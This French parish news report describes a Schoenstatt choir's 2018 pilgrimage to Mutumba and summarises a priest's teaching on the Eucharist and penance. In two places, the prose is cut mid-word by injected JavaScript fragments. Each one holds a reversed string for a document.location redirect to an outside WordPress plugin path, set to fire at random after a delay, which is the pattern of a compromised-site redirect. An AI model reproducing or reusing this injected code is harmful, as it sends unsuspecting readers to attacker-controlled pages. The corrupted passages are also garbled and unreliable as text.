Le samedi 17 novembre 2018, la Chorale Saint Martin du Sanctuaire marial de Schoenstatt Mont Sion Gikungu a effectué un pèlerinage vers le Sanctuaire marial de Schoenstatt de Mutumba. Cette Chorale était accompagnée par le Père Félicien NIMBONA, Recteur du Sanctuaire de Mont Sion.
Arrivés à Mutumba, ils ont été accueilli par les Soeurs de Marie de Schoenstatt de Mutumba. Après une petite présentation du Sanctuaire de Mutumba par ces sœurs, ils ont fait une petite prière. A suivi alors un enseignement sur « l’eucharistie et la pénitence » qui a été dispensé par le Père Félicien NIMBONA. Dans cet enseignement, le Père Félicien a parlé des grâces que nous recevons à partir de l’eucharistie :
-
L’eucharistie fortifie les relations que nous avons avec Dieu ;
-
Elle nous écarte du péché ;
-
Elle fortifie l’amour en nous et nous réconforte ;
-
Elle nous aide à nous rassembler dans le Christ ;
-
Elle nous aide à nous rapprocher des pauvres.
Mais, Père Félicien a dit qu’il faut réconcilier avec Dieu avant de communier. « Le péché nous écarte du Seigneur. Le péché est le manque de liberté spirituelle. Par introspection, il nous faut d’abord la reconnaissance du péché pour pouvoir s’en débarrasser. Le mot « igicumuro » (péché) serait lié au mot « icumu » (lance), pour dire que chaque fois que nous péchons, nous nous présentons comme le soldat qui a transpercé Jésus sur la croix. »
Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’exemple de Zaché qui a dû grimper sur l’arbre pour pouvoir s’approcher et voir le Seigneur. « La pénitence nécessite alors l’humilité, la reconnaissance du peché. Il est tout ce qui nous écarte de Dieu : l’adultère, le vol, l’injustice, les mensonges, le meurtre, des paroles blessantes, les avortements provoqués, le non-respect des parents et des autres, etc. » conclut le Père Félicien.
Après cet enseignement, ce pèlerinage a été clôturé par un moment d’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration et de confession avant une messe d’action de grâce. Ils sont arrivés à Mont Sion Gikungu vers 18h00 et ils étaient dans une joie totale.
Propos recueillis de la part du Dr Oscar NIYONZIMA
par Jean de Dieu NIYONKURU